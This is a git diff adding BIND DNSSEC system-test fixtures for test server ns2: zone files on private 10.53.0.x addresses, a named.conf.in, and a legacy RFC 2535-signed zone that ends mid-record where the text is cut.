-0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey-update.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in b/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cdnskey.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in b/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-auto.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in b/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-kskonly.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds-update.secure.db.in b/bin/tests/system/dnssec/ns2/cds-update.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds-update.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/cds.secure.db.in b/bin/tests/system/dnssec/ns2/cds.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/cds.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/child.nsec3.example.db b/bin/tests/system/dnssec/ns2/child.nsec3.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/child.nsec3.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/child.optout.example.db b/bin/tests/system/dnssec/ns2/child.optout.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/child.optout.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/corp.db b/bin/tests/system/dnssec/ns2/corp.db new file mode 100644 index 0000000..b2912bc --- /dev/null +++ b/bin/tests/system/dnssec/ns2/corp.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 30 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +www A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns2/dst.example.db.in b/bin/tests/system/dnssec/ns2/dst.example.db.in new file mode 100644 index 0000000..0039484 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/dst.example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +a A 10.0.0.1 diff --git a/bin/tests/system/dnssec/ns2/example.db.in b/bin/tests/system/dnssec/ns2/example.db.in new file mode 100644 index 0000000..f711f58 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/example.db.in @@ -0,0 +1,171 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A second insecure subdomain +insecure2 NS ns.insecure2 +ns.insecure2 A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A subdomain with a corrupt DS +badds NS ns.badds +ns.badds A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A subdomain with expired signatures +expired NS ns.expired +ns.expired A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +dnskey-unknown NS ns.dnskey-unknown +ns.dnskey-unknown A 10.53.0.3 + +dnskey-unsupported NS ns.dnskey-unsupported +ns.dnskey-unsupported A 10.53.0.3 + +dnskey-nsec3-unknown NS ns.dnskey-nsec3-unknown +ns.dnskey-nsec3-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 + +update-nsec3 NS ns.update-nsec3 +ns.update-nsec3 A 10.53.0.3 + +auto-nsec NS ns.auto-nsec +ns.auto-nsec A 10.53.0.3 + +auto-nsec3 NS ns.auto-nsec3 +ns.auto-nsec3 A 10.53.0.3 + + +below-cname CNAME some.where.else. + +insecure.below-cname NS ns.insecure.below-cname +ns.insecure.below-cname A 10.53.0.3 + +secure.below-cname NS ns.secure.below-cname +ns.secure.below-cname A 10.53.0.3 + +ttlpatch NS ns.ttlpatch +ns.ttlpatch A 10.53.0.3 + +split-dnssec NS ns.split-dnssec +ns.split-dnssec A 10.53.0.3 + +split-smart NS ns.split-smart +ns.split-smart A 10.53.0.3 + +upper NS ns.upper +ns.upper A 10.53.0.3 + +LOWER NS NS.LOWER +NS.LOWER A 10.53.0.3 + +expiring NS ns.expiring +ns.expiring A 10.53.0.3 + +future NS ns.future +ns.future A 10.53.0.3 + +managed-future NS ns.managed-future +ns.managed-future A 10.53.0.3 + +revkey NS ns.revkey +ns.revkey A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 diff --git a/bin/tests/system/dnssec/ns2/hours-vs-days.db.in b/bin/tests/system/dnssec/ns2/hours-vs-days.db.in new file mode 100644 index 0000000..5ec8801 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/hours-vs-days.db.in @@ -0,0 +1,167 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +bad-cname CNAME a +bad-dname DNAME @ + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A secure subdomain we're going to inject bogus data into +bogus NS ns.bogus +ns.bogus A 10.53.0.3 + +; A subdomain with a corrupt DS +badds NS ns.badds +ns.badds A 10.53.0.3 + +; A dynamic secure subdomain +dynamic NS dynamic +dynamic A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +; A subdomain with expired signatures +expired NS ns.expired +ns.expired A 10.53.0.3 + +; A rfc2535 signed zone w/ CNAME +rfc2535 NS ns.rfc2535 +ns.rfc2535 A 10.53.0.3 + +z A 10.0.0.26 + +keyless NS ns.keyless +ns.keyless A 10.53.0.3 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +dnskey-unknown NS ns.dnskey-unknown +ns.dnskey-unknown A 10.53.0.3 + +dnskey-unsupported NS ns.dnskey-unsupported +ns.dnskey-unsupported A 10.53.0.3 + +dnskey-nsec3-unknown NS ns.dnskey-nsec3-unknown +ns.dnskey-nsec3-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +*.wild A 10.0.0.27 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +kskonly NS ns.kskonly +ns.kskonly A 10.53.0.3 + +update-nsec3 NS ns.update-nsec3 +ns.update-nsec3 A 10.53.0.3 + +auto-nsec NS ns.auto-nsec +ns.auto-nsec A 10.53.0.3 + +auto-nsec3 NS ns.auto-nsec3 +ns.auto-nsec3 A 10.53.0.3 + + +below-cname CNAME some.where.else. + +insecure.below-cname NS ns.insecure.below-cname +ns.insecure.below-cname A 10.53.0.3 + +secure.below-cname NS ns.secure.below-cname +ns.secure.below-cname A 10.53.0.3 + +ttlpatch NS ns.ttlpatch +ns.ttlpatch A 10.53.0.3 + +split-dnssec NS ns.split-dnssec +ns.split-dnssec A 10.53.0.3 + +split-smart NS ns.split-smart +ns.split-smart A 10.53.0.3 + +upper NS ns.upper +ns.upper A 10.53.0.3 + +LOWER NS NS.LOWER +NS.LOWER A 10.53.0.3 + +expiring NS ns.expiring +ns.expiring A 10.53.0.3 + +future NS ns.future +ns.future A 10.53.0.3 + +managed-future NS ns.managed-future +ns.managed-future A 10.53.0.3 + +revkey NS ns.revkey +ns.revkey A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 diff --git a/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in b/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in new file mode 100644 index 0000000..874b915 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/in-addr.arpa.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. +; +; As we are testing empty zone behaviour ns3 doesn't need to be +; configured to serve 10.in-addr.arpa. +; +10 NS ns3.example. diff --git a/bin/tests/system/dnssec/ns2/insecure.secure.example.db b/bin/tests/system/dnssec/ns2/insecure.secure.example.db new file mode 100644 index 0000000..62862f5 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/insecure.secure.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns2/key.db.in b/bin/tests/system/dnssec/ns2/key.db.in new file mode 100644 index 0000000..2ff5df4 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/key.db.in @@ -0,0 +1,45 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; A secure subdomain +secure NS ns3.secure +ns3.secure A 10.53.0.3 + +; A subdomain that is signed with an unsupported algorithm +unsupported NS ns3.unsupported +ns3.unsupported A 10.53.0.3 + +; A secure subdomain with a disabled algorithm +disabled NS ns3.disabled +ns3.disabled A 10.53.0.3 + +; A secure subdomain with a disabled algorithm, but not in bailiwick +enabled NS ns3.enabled +ns3.enabled A 10.53.0.3 + +; A secure subdomain with a revoked trust anchor +revoked NS ns3.revoked +ns3.revoked A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns2/named.conf.in b/bin/tests/system/dnssec/ns2/named.conf.in new file mode 100644 index 0000000..fbfd070 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/named.conf.in @@ -0,0 +1,201 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; + notify-delay 1; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "trusted" { + type primary; + file "trusted.db.signed"; +}; + +zone "managed" { + type primary; + file "managed.db.signed"; +}; + +zone "example" { + type primary; + file "example.db.signed"; + allow-update { any; }; +}; + +zone "insecure.secure.example" { + type primary; + file "insecure.secure.example.db"; + allow-update { any; }; +}; + +zone "rfc2335.example" { + type primary; + file "rfc2335.example.db"; +}; + +zone "child.nsec3.example" { + type primary; + file "child.nsec3.example.db"; + allow-update { none; }; +}; + +zone "child.optout.example" { + type primary; + file "child.optout.example.db"; + allow-update { none; }; +}; + +zone "badparam" { + type primary; + file "badparam.db.bad"; +}; + +zone "single-nsec3" { + type primary; + file "single-nsec3.db.signed"; +}; + +zone "algroll" { + type primary; + file "algroll.db.signed"; +}; + +zone "nsec3chain-test" { + type primary; + file "nsec3chain-test.db.signed"; + allow-update {any;}; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.arpa.db.signed"; +}; + +zone "cds.secure" { + type primary; + file "cds.secure.db.signed"; +}; + +zone "cds-x.secure" { + type primary; + file "cds-x.secure.db.signed"; +}; + +zone "cds-update.secure" { + type primary; + file "cds-update.secure.db.signed"; + allow-update { any; }; +}; + +zone "cds-kskonly.secure" { + type primary; + dnssec-dnskey-kskonly yes; + file "cds-kskonly.secure.db.signed"; + allow-update { any; }; +}; + +zone "cds-auto.secure" { + type primary; + file "cds-auto.secure.db.signed"; + auto-dnssec maintain; + allow-update { any; }; +}; + +zone "cdnskey.secure" { + type primary; + file "cdnskey.secure.db.signed"; +}; + +zone "cdnskey-x.secure" { + type primary; + file "cdnskey-x.secure.db.signed"; +}; + +zone "cdnskey-update.secure" { + type primary; + file "cdnskey-update.secure.db.signed"; + allow-update { any; }; +}; + +zone "cdnskey-kskonly.secure" { + type primary; + dnssec-dnskey-kskonly yes; + file "cdnskey-kskonly.secure.db.signed"; + allow-update { any; }; +}; + +zone "cdnskey-auto.secure" { + type primary; + file "cdnskey-auto.secure.db.signed"; + auto-dnssec maintain; + allow-update { any; }; +}; + +zone "updatecheck-kskonly.secure" { + type primary; + auto-dnssec maintain; + key-directory "."; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; + sig-validity-interval 10; + dnskey-sig-validity 40; + file "updatecheck-kskonly.secure.db.signed"; + allow-update { any; }; +}; + +zone "corp" { + type primary; + file "corp.db"; +}; + +zone "hours-vs-days" { + type master; + file "hours-vs-days.db.signed"; + auto-dnssec maintain; + /* validity 500 days, resign in 499 days */ + sig-validity-interval 500 499; + allow-update { any; }; +}; + +zone "too-many-iterations" { + type master; + file "too-many-iterations.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/dnssec/ns2/private.secure.example.db.in b/bin/tests/system/dnssec/ns2/private.secure.example.db.in new file mode 100644 index 0000000..94042ae --- /dev/null +++ b/bin/tests/system/dnssec/ns2/private.secure.example.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +private2secure-nxdomain CNAME r.example. +*.wild CNAME s.example. diff --git a/bin/tests/system/dnssec/ns2/rfc2335.example.db b/bin/tests/system/dnssec/ns2/rfc2335.example.db new file mode 100644 index 0000000..78e9326 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/rfc2335.example.db @@ -0,0 +1,114 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; File written on Fri Apr 30 12:19:15 2004 +; dnssec_signzone version 9.2.4rc3 +rfc2335.example. 300 IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + 300 SIG SOA 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + nGPJKIzF7X/hMJbZURRz59UeEi/6HRxCn9Er + GqSnpw0Ea9Yx5Axu6sLKnF7jXlkZ6NHMCIpJ + +Lv+FDHXTs/dQg== ) + 300 NS ns.rfc2335.example. + 300 SIG NS 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + Q234AL9dJYMvxdWG33lpww6AJ3GplKp+ace7 + MUaj0oqDdkx4DtJF2XaP2xcqq7kTOObdQ8ES + vVxNThqOx7LFzg== ) + 300 KEY 256 3 1 ( + AQPZhzXIabI8y5ihWUw7F0WxN2MabnYWkOcV + Fn11NgaGSdjBSYPRMMwMCasD5N2KYPRUP83W + y8mj+ofcoW1FurcZ + ) ; key id = 47799 + 300 NXT a.rfc2335.example. NS SOA SIG KEY NXT + 300 SIG NXT 1 2 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + Y587mqNy6pBEfbsU6+weM2XRSqLwLwRT9Sl7 + oNuOK9kV3TR4R2M54m2S0MgJCXbRAwU+fF8Q + UbZkSTVe2N8Nyg== ) +a.rfc2335.example. 300 IN A 10.0.0.1 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + FnfWrcw5ire8ut25504zti5l///BdDMUAkJZ + UCLFiTW4lBGMcq1pqz64zltDZXCgJ3xUeQ2i + nRt19/ZxO6Z1KA== ) + 300 NXT b.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + R6SpC3ndMVg4u/eZaaUsXSuMHV/hZXeaM/Op + bJLAe3KxMiOHfb6XgLy7wflAiC1xt6A9bWpy + kTc5T5gfic33kA== ) +b.rfc2335.example. 300 IN A 10.0.0.2 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + zjRsYXMGyhDI6ipDtu8YXC9XPN+3hGamzzxL + 8uPE/LPo+x19MNdbzEgWzlajAf1/mkSGr2jN + BDMVBA5NMKpwAA== ) + 300 NXT d.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + aV87iZCYsC5Tqop827Zzb18TNqopGt0QynkR + gIF/lIHqZasNFRfaS1/nTnXdDKD8JS5IqxKb + oTJr5zswDAtCEw== ) +d.rfc2335.example. 300 IN A 10.0.0.4 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + NsKyvhUYZxTbOTBX4YwxTxevI5iGBpULKwmt + +D4l00ME4XRygOVmiqVDTT9dF1EgjDxOdfMT + hSjtCh5M1b2f6g== ) + 300 NXT ns.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + OGqlvSDZIZdHYigh4UAFzXfPze7vcQfgj7sN + +cAeoh4BL1gpa00DqANCxowNCYluDk3ZCDwt + UHZEJa8ZjNvv4g== ) +ns.rfc2335.example. 300 IN A 10.53.0.3 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + T6ZGeUWflLTku8jO23x/TeAPeUl8t0I18FCh + qHUZaHomLQasQ2jlZQn6cLpFd2uFJkBNxZ0G + I39aG7G1bObXdA== ) + 300 NXT x.rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + l46mrf3/Ii5iRm3AiDjYeMg4ZXBgitHxXA2y + e/NhKpkxRRpCs7UQ94wT/RiSCjjK49E5FBe6 + 5bRxtWq0GI7zlg== ) +x.rfc2335.example. 300 IN CNAME a.rfc2335.example. + 300 SIG CNAME 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + L3IOluq+kboBd2gR2Mu54uJKCUzfmyHRiWKl + kfx+vuFr0I8mEHQRmJtouxNDrBzmzGp5vybK + SdabLWw0n6uQEA== ) + 300 NXT z.rfc2335.example. CNAME SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + 